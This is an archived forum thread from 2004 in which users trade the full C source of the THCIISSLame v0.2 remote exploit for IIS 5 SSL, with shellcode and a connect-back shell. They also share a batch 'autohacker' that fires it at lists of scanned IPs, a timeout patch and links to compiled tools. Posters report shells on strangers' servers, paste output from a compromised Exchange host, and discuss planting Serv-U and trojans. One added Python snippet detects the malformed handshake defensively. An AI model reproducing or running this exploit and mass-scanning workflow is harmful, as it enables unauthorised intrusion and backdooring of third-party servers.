Full Version: Iis5 Ssl V0.2
o0oKARo0o
Scan port 443, and only English or German machines which have SP4, otherwise it will hang after sending the exploit.
3plx
guyz can some1 give me the autohacker
i got lots of open ports but i can't get a shell from them and i can't check all those ips manually
so plz who here has the autohacker
Roby
QUOTE (3plx @ Apr 24 2004, 03:10 PM)
guyz can some1 give me the autohacker
i got lots of open ports but i can't get a shell from them and i can't check all those ips manually
so plz who here has the autohacker

It's easy to write your own autohacker - it takes less than a minute, here is the code you put in a .bat file:
v2:
CODE

for /f "eol=; tokens=1*" %%i in (results.txt) do LAMEIIS.exe %%i yourIP yourPORT

v1:
CODE

for /f "eol=; tokens=1*" %%i in (results.txt) do LAMEIIS.exe %%i


results.txt - txt file with IP to check.
LAMEIIS.exe - you know what that is.

Roby
KieMaN
i have tried some but didn't find any shell
3plx
10x for the autohacker but it always gets stuck on the 1st ip waiting for a shell, what can i do to fix that
laggy
QUOTE (jimmy @ Apr 24 2004, 02:14 AM)
make some bat with : patch.exe /quiet /forcerestart /o /n /f
that will do the job if you use the correct patch for the correct os

then second, the autohacker with 0.2 won't work because indeed there is no timeout built in
if you know some c you can easily add a timeout like I did

CODE

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit appears to have failed!


That's what mine does now, really comes in handy.
BTW exploit version 0.2 is definitely better than 0.1

Could you please share this with us?
michael
could some1 help me out here
i'm stuck with the timeout thingie here on v0.2
it keeps hanging like posted by other members before

thx in advance
loco5
i don't understand why it does not work for all people (it does not work for me)
dEuS
Hey cool.
thX man!

Is there any way that the batch file automatically goes to the next ip in the list after 5 seconds or something like this?
Because if the exploit doesn't work we are waiting, and waiting, and waiting....

I tried it on my own, but don't know how...

edit:
can I do it with the "sleep" command? It doesn't work if I write it at the end, but it makes no sense to write it at the beginning?!
Ecko
@dEuS

only search in the source code for:

CODE

printf("[*] waiting for shell\n");


put the following code 1 line under that!

CODE

Sleep(6000);
printf("[*] exploit didn't w0rk - timeout!\n\n");
printf("[*][*][*] modded by Ecko [*][*][*]\n");
exit(-1);
3plx
can some1 compile it plz cuz my dev c++ can't compile that

CODE

/*****************************************************************************/
/* THCIISSLame 0.2 - IIS 5 SSL remote root exploit                           */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
/* THC PUBLIC SOURCE MATERIALS                                               */
/*                                                                           */
/* Bug was found by Internet Security Systems                                */
/* Reversing credits of the bug go to Halvar Flake                           */
/*                                                                           */
/* compile with MS Visual C++ : cl THCIISSLame.c                             */
/*                                                                           */
/* This little update uses a connectback shell !                             */
/*                                                                           */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
/* scut, stealth, FtR and Random                                             */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define jumper    "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

char shellcode[] =
"\xeb\x25\x7a\x69\x7f\x00\x00\x01\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce\x31\xdb\x53"
"\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30"
"\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55"
"\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65"
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57"
"\x53\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88"
"\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff"
"\x55\xf0\x6a\xff\xff\x55\xe4";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{  
 unsigned int i,sock,sock2,sock3,addr,rc,len=16;
 unsigned char *badbuf,*p;
 unsigned long offset = 0x6741a1cd;
 unsigned long XOR = 0xffffffff;

 unsigned short cbport;
 unsigned long  cbip;

 struct sockaddr_in mytcp;
 struct hostent * hp;
 WSADATA wsaData;

 printf("\nTHCIISSLame v0.2 - IIS 5.0 SSL remote root exploit\n");
 printf("tested on Windows 2000 Server german/english SP4\n");
 printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

 if(argc<4 || argc>4)
  usage();

 badbuf = malloc(327);
 memset(badbuf,0,327);

 printf("\n[*] building buffer\n");

 p = badbuf;

 memcpy(p,sslshit,sizeof(sslshit));

 p+=sizeof(sslshit)-1;
 
 strcat(p,jumper);

 strcat(p,greetings_to_microsoft);

 offset^=XOR;
 strncat(p,(unsigned char *)&offset,4);

 cbport = htons((unsigned short)atoi(argv[3]));
 cbip = inet_addr(argv[2]);
 memcpy(&shellcode[2],&cbport,2);
 memcpy(&shellcode[4],&cbip,4);

 strcat(p,shellcode);
 
 if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
 {
  printf("WSAStartup failed !\n");
  exit(-1);
 }
 
 hp = gethostbyname(argv[1]);

 if (!hp){
  addr = inet_addr(argv[1]);
 }
 if ((!hp)  && (addr == INADDR_NONE) )
 {
  printf("Unable to resolve %s\n",argv[1]);
  exit(-1);
 }

 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 if (!sock)
 {
  printf("socket() error...\n");
  exit(-1);
 }
 
 if (hp != NULL)
  memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
 else
  mytcp.sin_addr.s_addr = addr;

 if (hp)
  mytcp.sin_family = hp->h_addrtype;
 else
  mytcp.sin_family = AF_INET;

 mytcp.sin_port=htons(443);

 printf("[*] connecting the target\n");

 rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
 if(rc==0)
 {
     send(sock,badbuf,326,0);
     printf("[*] exploit send\n");
     Sleep(500);
 
     mytcp.sin_addr.s_addr = 0;
     mytcp.sin_port=htons((unsigned short)atoi(argv[3]));

     sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
     
     rc=bind(sock2,(struct sockaddr *)&mytcp,16);
     if(rc!=0)
     {
      printf("bind error() %d\n",WSAGetLastError());
      exit(-1);
     }
 
     rc=listen(sock2,1);
     if(rc!=0)
     {
      printf("listen error()\n");
      exit(-1);
     }

     printf("[*] waiting for shell\n");
     Sleep(6000);
     printf("[*] exploit didn't w0rk - timeout!\n\n");
     printf("[*][*][*] modded by Ecko[*][*][*]\n");
     exit(-1);

     sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
     if(sock3)
     {
      printf("[*] Exploit successful ! Have fun !\n");
      printf("[*] --------------------------------------------------------------------\n\n");
      shell(sock3);
     }
 }
 else
 {
  printf("\nCan't connect to ssl port 443!\n");
  exit(-1);
 }
 
 shutdown(sock,1);
 closesocket(sock);
 shutdown(sock,2);
 closesocket(sock2);
 shutdown(sock,3);
 closesocket(sock3);

 free(badbuf);

 exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage:  <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
exit(0);
}

void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
 ul[0] = 1;
 ul[1] = sock;

 l = select (0, (fd_set *)&ul, NULL, NULL, &time);
 if(l == 1)
 {  
  l = recv (sock, buf, sizeof (buf), 0);
  if (l <= 0)
  {
   printf ("bye bye...\n");
   return;
  }
 l = write (1, buf, l);
  if (l <= 0)
  {
   printf ("bye bye...\n");
   return;
  }
 }
 else
 {
  l = read (0, buf, sizeof (buf));
  if (l <= 0)
  {
   printf("bye bye...\n");
   return;
  }
  l = send(sock, buf, l, 0);
  if (l <= 0)
  {
   printf("bye bye...\n");
   return;
  }
 }
}
}

plz guyz some1 compile it, it is the exploit modded by ecko
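As an added example for this thread (not code from THC or from any poster), here is a small Python check a defender can run over the first bytes of a client message on TCP/443 to flag a CLIENT-HELLO shaped like the one this exploit sends. It uses the 17-byte sslshit prefix exactly as it appears in the posted source; the zero padding to 326 bytes (the size the posted send() ships) and the well-formed hello it is compared against are constructed here, and the field rules come from the SSLv2 specification rather than from the shellcode.

```python
"""Flag a malformed SSLv2 CLIENT-HELLO at the start of a TCP/443 client message.

Added example for this thread; not code from THC or from any poster.
THREAD_PREFIX is the 17-byte 'sslshit' array exactly as posted above.
The zero padding to 326 bytes (the exploit's send() size) and the
well-formed hello are constructed here for contrast.  Field rules come
from the SSLv2 specification; no knowledge of the shellcode is needed.
"""
import struct

CLIENT_HELLO = 0x01

# Bytes copied from the 'sslshit' array in the posted source.
THREAD_PREFIX = bytes.fromhex("806201" "02bd" "0001" "0001" "0016" "8f8201000000")

# Constructed: the same prefix padded with zeros to the 326 bytes send() ships.
THREAD_SAMPLE_326 = THREAD_PREFIX + b"\x00" * (326 - len(THREAD_PREFIX))


def parse_sslv2_client_hello(payload):
    """Decode the 2-byte SSLv2 record header and the CLIENT-HELLO fixed fields.

    With the high bit of byte 0 set, the header is two bytes and the record
    length is the low 15 bits.  The body then starts with msg_type(1),
    version(2), cipher_spec_len(2), session_id_len(2), challenge_len(2).
    """
    if len(payload) < 11:
        raise ValueError("too short for an SSLv2 record header plus CLIENT-HELLO")
    if not payload[0] & 0x80:
        raise ValueError("not a 2-byte SSLv2 record header")
    record_len = struct.unpack("!H", payload[:2])[0] & 0x7FFF
    msg_type, version, cipher_len, sid_len, chal_len = struct.unpack("!BHHHH", payload[2:11])
    return {
        "record_len": record_len,
        "msg_type": msg_type,
        "version": version,
        "cipher_spec_len": cipher_len,
        "session_id_len": sid_len,
        "challenge_len": chal_len,
        "payload_len": len(payload),
    }


def client_hello_anomalies(payload):
    """Return the list of SSLv2 CLIENT-HELLO rules the message breaks (empty if sane)."""
    h = parse_sslv2_client_hello(payload)
    problems = []
    if h["msg_type"] != CLIENT_HELLO:
        return problems  # only CLIENT-HELLO is checked here
    # cipher specs are 3-byte kinds and at least one must be offered
    if h["cipher_spec_len"] == 0 or h["cipher_spec_len"] % 3:
        problems.append("cipher_spec_len is not a non-zero multiple of 3")
    if h["session_id_len"] not in (0, 16):
        problems.append("session_id_len is neither 0 nor 16")
    if not 16 <= h["challenge_len"] <= 32:
        problems.append("challenge_len is outside 16..32")
    # the record length must equal the 9 fixed bytes plus the three variable fields
    expected = 9 + h["cipher_spec_len"] + h["session_id_len"] + h["challenge_len"]
    if h["record_len"] != expected:
        problems.append("record_len %d does not match field lengths (%d)" % (h["record_len"], expected))
    # a client waits for SERVER-HELLO, so its first message should end with the record
    if h["payload_len"] > 2 + h["record_len"]:
        problems.append("%d bytes follow the declared record" % (h["payload_len"] - 2 - h["record_len"]))
    return problems


def build_client_hello(cipher_specs, session_id, challenge):
    """Constructed, well-formed SSLv2 CLIENT-HELLO for comparison."""
    body = struct.pack("!BHHHH", CLIENT_HELLO, 0x0002,
                       len(cipher_specs), len(session_id), len(challenge))
    body += cipher_specs + session_id + challenge
    return struct.pack("!H", 0x8000 | len(body)) + body


# Two SSLv2 cipher kinds (RC4-128-MD5 and RC2-128-CBC-MD5), no session id, 16-byte challenge.
GOOD_HELLO = build_client_hello(bytes.fromhex("010080" "030080"), b"", bytes(range(16)))


if __name__ == "__main__":
    for name, sample in (("thread prefix", THREAD_PREFIX),
                         ("prefix padded to 326", THREAD_SAMPLE_326),
                         ("well-formed hello", GOOD_HELLO)):
        print(name, parse_sslv2_client_hello(sample))
        print("  anomalies:", client_hello_anomalies(sample) or "none")
```

On the posted prefix the declared record length (98) is three times what the header's own field lengths add up to, the cipher-spec and session-id lengths are both 1 (neither is legal in SSLv2), and the padded sample carries 226 bytes past the record; a well-formed hello triggers none of these checks, so the logic is usable as a signature for this family of packets without matching on shellcode bytes.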
OldSkool
autohacker v.02

www.area51-crew.de/freesux.rar

lol deus^^
Ecko
@3plx

QUOTE

compile with MS Visual C++ : cl THCIISSLame.c 


but i've got a compiled version here without the hang...!

Get it here with right click, save as

hav3 phun!
dEuS
I love you ecko

I'll get 1 million errors while compiling and I only use the command which is given in the *.c file...

ThX 4 compiling again!

cya


Ecko
no problem @ deus
michael
so....did any1 here actually get any shells with the 0.2 version
and does it only work with german/english servers ?!!?
rvd
Haven't got any shells so far, maybe i just have bad luck or am i doing something wrong. I'll tell you what i did:

- I compiled the code with dev c++ with the mod of Ecko, thank you for that.
- I made a little autohacker in a .bat file, nothing special.
- Then i started scanning with a modified version of sfind, i scanned port 443 on a german range.
- After the scanning i did a banner scan on the results of the port scan (did it with Scanline: command sl -bhpt 80 -f input.txt -o output.txt)
- Filtered the banner scan and took every ip where the banner scan said: Microsoft-IIS/5.0
- Then i put the ip's in a txt file and executed the autohacker.
- Most of the time it says: Exploit didn't work - Timeout! (because of the ecko mod)

Well i don't see that i do anything wrong, so maybe i just have bad luck, well anyway maybe someone else could help me or i have helped him (because of my steps, and he has more luck than me)

Well thnx in advance
G777
heres my little autohacker gui, (thanx to Ecko for the modded sploit)

CODE
http://www.freewebs.com/guernica777/G777-SSL-IIS.rar


ps ignore the netcat button, it's just there cos i couldn't be bothered to take it out again
Ecko
peaz

i've just made an english version of my mod

you can get it here:

Right click save as

hav3 phun


*edit*

@G777

very nice stuff you coded!

*EDIT2*
W0000T!!!
G777
PERFECT!!! It works perfectly! i got a shell!!! just scan 62.47.*.* and you get many many results!! Nice
ind0r
Hi all! I tried it a lot of times but it worked only a few times. But the biggest problem was when I got a shell, because a few minutes (or seconds) later the destination IP didn't answer, ping or something like that didn't work. When I got a shell, first I tried "net user" and I saw an RPC error. Could you help?
rush
G777 your source is already down hehe, nice shot!
http://www.freewebs.com/guernica777/G777-SSL-IIS.rar
G777
lol damn freehosts man
new link
CODE
http://www.angelfire.com/theforce/g777/G777-IIS-SSL.rar
ESKiM0J03
thanks E.. still seems in a diff lang to me though, well the part after "exploit send".. not that it's a big deal, thanks for the compile!
arn0ld
G777
thx for the auto-hacker
Q: am i still supposed to get this bind error?
CODE

bind error() 10048

cuz it's the same thing...
ESKiM0J03
arnold if i'm correct you don't run netcat at all
FazerFreak
G777 nice job you did there, gonna check it out tonight
mighty_falcon
QUOTE (G777 @ Apr 24 2004, 06:35 PM)
lol damn freehosts man
new link
CODE
http://www.angelfire.com/theforce/g777/G777-IIS-SSL.rar

QUOTE
The page you are attempting to access has been removed because it violated Angelfire's Terms of Service.


both links down
michael
i'm confused here...do u use netcat with this or not...and what port do u use with netcat..does that matter ?!!?
ESKiM0J03
tried a few 1000 ips and no shell
DarkAngel52457
hello

I have a problem

when i upload my serv-u and start it i can't connect to the server with FlashFXP

i have this problem on all servers

help me please


Sorry for my bad english
Ecko
that's the wrong way @DarkAngel52457, you should first install a trojan!
FazerFreak
any tips on trojans that are easy, small and good to use? preferably not detected by av of course
loco5
does someone have an idea why it does not work for all people (i'm under win98 se)
DarkAngel52457
What trojan is good for this ????

Then i have many shells
saendler
@G777 both links are down...damn..i'm too late...

anyone out there to help out
thyr0x1ne
many shells but no "serv-u success"?
i'm not surprised; admins who use SSL for the security of their site of course use Antivir/Firewall; don't expect to fall into a poorly protected server or an .edu
michael
QUOTE (Ecko @ Apr 24 2004, 09:26 PM)
that's the wrong way @DarkAngel52457, you should first install a trojan!

What do u mean by that ?!!?...i know what a trojan is but what's it good for ?!!?
jpno5
trojans r good for nothin bar getting urself caught, darkangel check the servustartuplog.txt. u will probably find that serv-u is already running on the machine; run fport and look for any suspicious processes. there's also a perl script been released today which is 20x better
DarkAngel52457
i can't connect to serv-u when i have started it


QUOTE
by Ecko
that's the wrong way @DarkAngel52457, you should first install a trojan!



what trojan
SeNe
QUOTE (DarkAngel52457 @ Apr 24 2004, 09:19 PM)
hello

I have a problem

when i upload my serv-u and start it i can't connect to the server with FlashFXP

i have this problem on all servers

help me please


Sorry for my bad english

because with the connect back exploit u can only enter lan boxes (network machines).
when u get a hit just type ipconfig and look at the info u get, if u see something like this:

PPP adapter {8B5DB1CD-7435-44D4-81C4-B70C6283CFE3}:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.234.235
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . :

then u can't start serv-u there, because the listening IP address is internal.

i got many hits with v. 0.2 but almost all are internal ips.
Demsta
QUOTE (thyr0x1ne @ Apr 24 2004, 09:55 PM)
many shells but no "serv-u success"?
i'm not surprised; admins who use SSL for the security of their site of course use Antivir/Firewall; don't expect to fall into a poorly protected server or an .edu

i have fallen into many.. just to let them know that they need a patch
Demsta
QUOTE (SeNe @ Apr 23 2004, 10:54 PM)
u can download the patch from here PATCH ME and yes u can patch from CMD, just google a bit and u will find the answer

cheers, was looking for this the other day but i couldn't find it
realloader
Serv-u is and was starting on this machine, but i can not connect to it.
And i tested 4 trojans, Optix, Prorat, Beast, Theef, but i can not connect to my trojan either.
What can i do?
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9C2F-BC5B

Directory of C:\

02/21/2002 09:16p <DIR> Bkup
06/26/2002 06:48p <DIR> Documents and Settings
11/12/2001 09:42p <DIR> Event logs
02/04/2002 08:44p 2,931,326 Exchange Server Setup Progress.log
11/06/2001 09:04p <DIR> Inetpub
01/19/2002 08:24p 43,690 junk.txt
02/21/2002 09:01p 3,487 legacy.ldf
11/25/2002 08:50a <DIR> pcnet
04/13/2004 10:33a <DIR> Program Files
02/04/2002 08:11p <DIR> Temp
05/27/2002 10:16a <DIR> WebAdminLogs
04/13/2004 10:52a <DIR> WINNT
3 File(s) 2,978,503 bytes
9 Dir(s) 1,918,889,472 bytes free

C:\>net start
net start
These Windows 2000 services are started:

Automatic Updates
Background Intelligent Transfer Service
COM+ Event System
Computer Browser
DameWare Mini Remote Control
DHCP Client
DHCP Server
Distributed File System
Distributed Link Tracking Client
Distributed Link Tracking Server
Distributed Transaction Coordinator
DNS Client
DNS Server
Event Log
File Replication Service
FTP Publishing Service
IIS Admin Service
Intersite Messaging
IPSEC Policy Agent
Kerberos Key Distribution Center
License Logging Service
Logical Disk Manager
Messenger
Microsoft Exchange Event
Microsoft Exchange IMAP4
Microsoft Exchange Information Store
Microsoft Exchange Management
Microsoft Exchange MTA Stacks
Microsoft Exchange POP3
Microsoft Exchange Routing Engine
Microsoft Exchange System Attendant
Microsoft Search
Net Logon
Network Associates Alert Manager
Network Associates McShield
Network Associates Task Manager
Network Connections
Network News Transport Protocol (NNTP)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Procedure Call (RPC) Locator
Remote Registry Service
Removable Storage
RunAs Service
Security Accounts Manager
Server
Simple Mail Transport Protocol (SMTP)
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
Telephony
Terminal Services
Windows Internet Name Service (WINS)
Windows Management Instrumentation
Windows Management Instrumentation Driver Extensions
Windows Time
Workstation
World Wide Web Publishing Service

The command completed successfully.


C:\>
oPtIk
n1
G777
here's another link for my autohacker for you guys that missed it

oh yeah, remember ignore the netcat button, it's only there because i couldn't be bothered taking it out and redoing the gui

CODE
http://squadron11.tripod.com/G777-SSL-IIS.exe
tte
QUOTE (G777 @ Apr 25 2004, 07:00 AM)
here's another link for my autohacker for you guys that missed it

oh yeah, remember ignore the netcat button, it's only there because i couldn't be bothered taking it out and redoing the gui

CODE
http://squadron11.tripod.com/G777-SSL-IIS.exe

Send it to me by mail, i'll upload it somewhere stable.
erezpix@yahoo.com
sh4d0w`
just posted 2 hours ago, and now: Sorry, but the page or the file that you're looking for is not here.
i can put it on my webspace if u want....but i first need to have it
hegemonie
yea, would be better cuz the tripod link gives me this

Sorry, but the page or the file that you're looking for is not here.
- Please check to see that you've entered the correct URL.
- The owner of this site may have chosen to delete their membership.
- The site may have been removed due to a violation of Tripod's Terms of Service.
- The site may have been moved to a different URL.
G777
dammit them guys are quick lol
ok here's another link, this one should be ok

CODE
http://www.freewebs.com/guernica777/G777-IIS-SSL.rar

(use flashget)
DarkAngel52457
nice Tool @G777

the problem is i can't connect to serv-u


What can i do ????????
Invision Power Board © 2001-2005 Invision Power Services, Inc.